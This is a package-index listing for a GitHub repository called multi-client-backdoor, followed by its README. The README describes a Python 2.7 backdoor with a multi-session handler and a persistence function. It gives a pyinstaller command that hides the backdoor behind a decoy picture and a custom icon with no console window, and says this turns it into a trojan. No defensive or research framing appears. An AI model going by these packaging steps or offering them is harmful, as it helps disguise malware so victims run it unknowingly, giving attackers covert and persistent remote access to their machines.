Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/rundtstykker/multi-client-backdoor
Allows the client handler to have co-current backdoor session like metaslploit
https://github.com/rundtstykker/multi-client-backdoor
Last synced: 5 days ago
JSON representation
Allows the client handler to have co-current backdoor session like metaslploit
- Host: GitHub
- URL: https://github.com/rundtstykker/multi-client-backdoor
- Owner: rundtstykker
- Created: 2023-06-22T01:46:43.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2023-06-22T01:49:42.000Z (over 1 year ago)
- Last Synced: 2024-09-24T19:23:18.194Z (about 2 months ago)
- Language: Python
- Size: 5.86 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# multi-client-backdoor
Allows the client handler to have co-current backdoor session like metaslploitI like to attach a file and its appropriate file icon together with a malware (making it a trojan) C:\Python27\Scripts\pyinstaller.exe backdoor.py] --onefile --noconsole --add-data “C:/Downloads/pic.jpg;.” --icon C:/Downloads/file_name.ico
Written in python 2.7, make sure to use the appropriate interrupter. The sample file is pic.jpg in the backdoor.py. Make sure to modify the subprocess file call to whatever front file you want to use, and reflect it in the compiler command.The backdoor also has a persostence mechanism by def (become_per) function definition